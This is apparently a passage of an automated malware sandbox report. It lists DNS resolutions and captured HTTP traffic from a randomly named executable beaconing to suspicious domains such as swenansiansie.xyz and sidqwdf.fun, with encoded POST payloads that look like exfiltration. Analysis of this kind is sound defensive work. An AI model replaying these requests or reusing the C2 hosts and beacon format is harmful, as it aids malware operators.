                                                                                                                                                                            Dec 11, 2024 09:39:39.925025940 CET1.1.1.1192.168.2.50x3633No error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:40.222278118 CET1.1.1.1192.168.2.50x3633No error (0)www.sidqwdf.fun185.106.176.204A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:41.796406984 CET1.1.1.1192.168.2.50x4e4eNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.854379892 CET1.1.1.1192.168.2.50xb3d5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.854379892 CET1.1.1.1192.168.2.50xb3d5No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.854664087 CET1.1.1.1192.168.2.50x1f33No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.474896908 CET1.1.1.1192.168.2.50x44daNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475100994 CET1.1.1.1192.168.2.50x170eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475100994 CET1.1.1.1192.168.2.50x170eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475111961 CET1.1.1.1192.168.2.50x3e50No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475111961 CET1.1.1.1192.168.2.50x3e50No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.475881100 CET1.1.1.1192.168.2.50x5ee7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.495547056 CET1.1.1.1192.168.2.50xb3c6No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.495547056 CET1.1.1.1192.168.2.50xb3c6No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.496345997 CET1.1.1.1192.168.2.50xe0d1No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET1.1.1.1192.168.2.50x21feNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.729001999 CET1.1.1.1192.168.2.50x6024No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.757761002 CET1.1.1.1192.168.2.50x6769No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:47.044199944 CET1.1.1.1192.168.2.50xeb22No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET1.1.1.1192.168.2.50xa0c4No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.637772083 CET1.1.1.1192.168.2.50xd69fNo error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)acdn.adnxs.comprod.appnexus.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.1.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.193.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.129.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET1.1.1.1192.168.2.50x3adNo error (0)prod.appnexus.map.fastly.net151.101.65.108A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET1.1.1.1192.168.2.50x3505No error (0)www.swenansiansie.xyzswenansiansie.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET1.1.1.1192.168.2.50x3505No error (0)swenansiansie.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET1.1.1.1192.168.2.50x3505No error (0)swenansiansie.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:22.379512072 CET1.1.1.1192.168.2.50xbcf0Name error (3)www.mp3cevir.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:30.949043036 CET1.1.1.1192.168.2.50x60b1No error (0)www.spectre.center5.39.10.93A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:42.829586983 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:42.829586983 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:43.831469059 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:43.831469059 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:44.844034910 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:44.844034910 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:46.453191996 CET1.1.1.1192.168.2.50xb511No error (0)www.synd.fun194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:46.848608971 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:46.848608971 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:50.852696896 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:50.852696896 CET1.1.1.1192.168.2.50x6950No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:01.441981077 CET1.1.1.1192.168.2.50x11fcNo error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET1.1.1.1192.168.2.50x39d0No error (0)www.wiretap.digitalwiretap.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET1.1.1.1192.168.2.50x39d0No error (0)wiretap.digital3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET1.1.1.1192.168.2.50x39d0No error (0)wiretap.digital15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET1.1.1.1192.168.2.50x2617No error (0)www.it2sp8.vipit2sp8.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET1.1.1.1192.168.2.50x2617No error (0)it2sp8.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET1.1.1.1192.168.2.50x2617No error (0)it2sp8.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET1.1.1.1192.168.2.50x62bNo error (0)www.cbprecise.onlinecbprecise.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET1.1.1.1192.168.2.50x62bNo error (0)cbprecise.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET1.1.1.1192.168.2.50x62bNo error (0)cbprecise.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:01.474280119 CET1.1.1.1192.168.2.50xe175No error (0)www.yun08ps.top47.238.157.253A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:24.771240950 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:24.771240950 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:25.779876947 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:25.779876947 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:26.782510042 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:26.782510042 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:28.797722101 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:28.797722101 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:32.813080072 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:32.813080072 CET1.1.1.1192.168.2.50x6b5cNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:36.822680950 CET1.1.1.1192.168.2.50x32d0No error (0)www.yun08ps.top47.238.157.253A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:37.068069935 CET1.1.1.1192.168.2.50xfe35No error (0)www.rtpsilva4d.clickrtpsilva4d.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:37.068069935 CET1.1.1.1192.168.2.50xfe35No error (0)rtpsilva4d.click67.223.117.169A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.724489927 CET1.1.1.1192.168.2.50x9d81No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.724489927 CET1.1.1.1192.168.2.50x9d81No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.725071907 CET1.1.1.1192.168.2.50xa5c2No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.453597069 CET1.1.1.1192.168.2.50xb60dNo error (0)www.restobarbebek.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.453597069 CET1.1.1.1192.168.2.50xb60dNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.453597069 CET1.1.1.1192.168.2.50xb60dNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.547450066 CET1.1.1.1192.168.2.50xb60dNo error (0)www.restobarbebek.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.547450066 CET1.1.1.1192.168.2.50xb60dNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.547450066 CET1.1.1.1192.168.2.50xb60dNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                            • https:
                                                                                                                                                                              • code.jquery.com
                                                                                                                                                                              • sb.scorecardresearch.com
                                                                                                                                                                              • acdn.adnxs.com
                                                                                                                                                                            • www.sidqwdf.fun
                                                                                                                                                                            • www.swenansiansie.xyz
                                                                                                                                                                            • www.spectre.center
                                                                                                                                                                            • www.synd.fun
                                                                                                                                                                            • www.jagdud.store
                                                                                                                                                                            • www.wiretap.digital
                                                                                                                                                                            • www.it2sp8.vip
                                                                                                                                                                            • www.cbprecise.online
                                                                                                                                                                            • www.yun08ps.top
                                                                                                                                                                            • www.rtpsilva4d.click
                                                                                                                                                                            • www.restobarbebek.xyz
                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            0192.168.2.549769185.106.176.204804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:39:40.533396959 CET547OUTGET /enzp/?rJl09=1ZZ8JloHsT&x6lPJLCP=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwj9LP9u3P+B96vBaOMx3H/c3knsZvSPscaH9VeTyek1Wueg== HTTP/1.1
                                                                                                                                                                            Host: www.sidqwdf.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            1192.168.2.5499273.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:07.995930910 CET819OUTPOST /08fk/ HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.swenansiansie.xyz
                                                                                                                                                                            Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 53 78 76 32 2b 49 4c 6c 33 45 52 38 4f 58 44 4f 70 4b 6a 58 72 54 61 58 50 66 74 61 74 50 64 64 35 30 6f 6b 6c 32 32 35 72 74 4e 72 6c 77 77 78 62 33 6f 72 77 4d 4b 78 34 61 30 69 6e 4d 4b 45 4f 44 78 6a 37 53 4a 2f 64 33 38 47 2b 4c 30 32 53 45 32 4e 4c 53 51 70 69 50 42 38 7a 59 34 4e 76 75 56 6f 6e 64 48 66 6d 4c 79 68 68 42 31 61 4d 6d 31 48 76 39 38 2f 31 47 6e 77 59 64 61 7a 61 44 49 49 46 63 6d 6e 75 62 51 62 38 50 76 68 68 71 73 74 6b 7a 48 47 39 4f 71 53 33 36 6d 61 76 75 6d 6f 6d 39 30 32 77 5a 4e 65 58 59 58 65 6a 48 35 50 78 49 41 49 64 41 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=9MVRUBQD0iJJgSxv2+ILl3ER8OXDOpKjXrTaXPftatPdd50okl225rtNrlwwxb3orwMKx4a0inMKEODxj7SJ/d38G+L02SE2NLSQpiPB8zY4NvuVondHfmLyhhB1aMm1Hv98/1GnwYdazaDIIFcmnubQb8PvhhqstkzHG9OqS36mavumom902wZNeXYXejH5PxIAIdA=
                                                                                                                                                                            Dec 11, 2024 09:40:09.077990055 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            2192.168.2.5499343.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:10.659851074 CET839OUTPOST /08fk/ HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.swenansiansie.xyz
                                                                                                                                                                            Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 7a 42 76 6d 70 55 4c 69 58 45 57 67 65 58 44 41 4a 4c 6b 58 72 50 61 58 4c 48 48 62 66 72 64 64 64 77 6f 6c 6e 65 32 2b 72 74 4e 67 46 77 31 75 72 33 64 72 77 51 34 78 34 6d 30 69 68 67 4b 45 4c 6e 78 6a 49 36 4b 2f 4e 33 36 41 2b 4c 32 6f 69 45 32 4e 4c 53 51 70 69 4c 72 38 7a 41 34 4b 65 65 56 71 44 70 45 58 47 4c 78 6f 42 42 31 4c 38 6e 64 48 76 38 70 2f 30 72 38 77 61 56 61 7a 61 7a 49 52 30 63 6e 73 75 62 57 55 63 4f 35 6d 45 48 44 70 46 37 73 48 62 44 7a 4e 78 4f 79 57 35 66 4d 79 45 31 63 6c 51 31 31 4f 45 51 67 50 54 6d 51 56 53 59 77 57 4b 57 43 58 64 73 77 34 6b 50 37 62 64 6c 31 31 2f 46 7a 7a 6e 57 75
                                                                                                                                                                            Data Ascii: x6lPJLCP=9MVRUBQD0iJJgzBvmpULiXEWgeXDAJLkXrPaXLHHbfrdddwolne2+rtNgFw1ur3drwQ4x4m0ihgKELnxjI6K/N36A+L2oiE2NLSQpiLr8zA4KeeVqDpEXGLxoBB1L8ndHv8p/0r8waVazazIR0cnsubWUcO5mEHDpF7sHbDzNxOyW5fMyE1clQ11OEQgPTmQVSYwWKWCXdsw4kP7bdl11/FzznWu
                                                                                                                                                                            Dec 11, 2024 09:40:11.728720903 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            3192.168.2.5499443.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:13.312793970 CET1760OUTPOST /08fk/ HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.swenansiansie.xyz
                                                                                                                                                                            Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 7a 42 76 6d 70 55 4c 69 58 45 57 67 65 58 44 41 4a 4c 6b 58 72 50 61 58 4c 48 48 62 66 6a 64 63 75 6f 6f 6b 42 57 32 2f 72 74 4e 38 56 77 30 75 72 33 41 72 77 59 38 78 34 71 4b 69 6b 38 4b 43 74 37 78 68 35 36 4b 78 4e 33 36 43 2b 4c 7a 32 53 45 76 4e 4c 44 5a 70 69 37 72 38 7a 41 34 4b 64 47 56 6b 48 64 45 61 6d 4c 79 68 68 42 35 61 4d 6e 6d 48 76 30 35 2f 30 75 4a 78 72 31 61 7a 2b 66 49 54 6d 45 6e 7a 65 62 55 52 63 4f 78 6d 45 44 63 70 46 33 4b 48 62 66 5a 4e 32 36 79 54 34 75 68 70 6e 4a 6f 6d 43 5a 6a 4e 6b 59 45 65 57 2b 6e 62 56 30 78 66 72 71 55 49 39 68 54 31 67 50 70 52 35 6f 4d 74 65 38 68 32 52 71 67 68 41 2f 6f 56 67 79 71 53 37 55 49 48 66 4d 4a 68 7a 6d 56 77 6b 69 31 2f 5a 2b 6e 45 66 5a 30 73 34 4a 64 69 47 53 46 72 4b 32 46 72 4e 56 39 36 6c 77 53 55 6b 67 68 32 58 76 50 48 2b 5a 63 67 39 6a 4d 31 54 71 46 35 6c 45 78 67 6a 71 35 67 4d 66 2f 58 36 67 5a 54 78 77 6c 35 4f 4e 42 65 37 4e 56 33 68 76 7a 63 30 38 56 70 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=9MVRUBQD0iJJgzBvmpULiXEWgeXDAJLkXrPaXLHHbfjdcuookBW2/rtN8Vw0ur3ArwY8x4qKik8KCt7xh56KxN36C+Lz2SEvNLDZpi7r8zA4KdGVkHdEamLyhhB5aMnmHv05/0uJxr1az+fITmEnzebURcOxmEDcpF3KHbfZN26yT4uhpnJomCZjNkYEeW+nbV0xfrqUI9hT1gPpR5oMte8h2RqghA/oVgyqS7UIHfMJhzmVwki1/Z+nEfZ0s4JdiGSFrK2FrNV96lwSUkgh2XvPH+Zcg9jM1TqF5lExgjq5gMf/X6gZTxwl5ONBe7NV3hvzc08VpbnH33ZnwmWydRcaInr34K9KU1n9aL6n+DXUbxYKBJ3ROnG9zPFDrR97tompsmFl2Pv0cICYILC6a+EvmSwhxHgKz1oNbpIhWM1ljK6AcUR/Fu4B8ay1BNwkQHQ9pdBfoboVD5Dwgv4WaTZD3RnV25HBmxC+ECzP6CjJnnxFyMld/xqp7aY343WawtyQ8SNNFSXZegIFxz4F1cGv+jfXxSDPsmg4ZUbHh1INPKkPBpBwepIAvmFNtP648+jfTxNmBd4byZqAp0S7AcKEIoBTVQc0jvy2cTGoroecdFbbc7ds7R0Haq2cjrvxDxpavRbZ2K4mbjcMMCyKNTgVhnHGexPRhftB/A9C1c8b6qq036e8y40qTy3u+o1SjH/bcI4vuwVs0TwYSjFp50869bQy5kPMWJ5qSgZgQu1Niyd/AR9VEfpRVBR3OJLGDNYPCQtN65mRs7Q6Gvl4/TMeOBhkJFR4v6t9QfQtzxqXMtJa8wFcNGpASLhjdg6uGTN58TGzuT0JFTY3oxCdQZbGUYV1Ns8G48lV5RqVOK+Pl/bAGulR+wb4maT6Hii+krcC8BBnux+yBirFaDQAQ5BdSIkC7DfeG2MezrtRmf0X0rshT97LXMEPlDI/KOrTR1BiqeW30kRfMClCpI2E23vnz/tzJGN3+snm71KDRPk [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:14.395376921 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            4192.168.2.5499533.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:15.951203108 CET553OUTGET /08fk/?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.swenansiansie.xyz
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:40:17.046646118 CET394INHTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:40:16 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
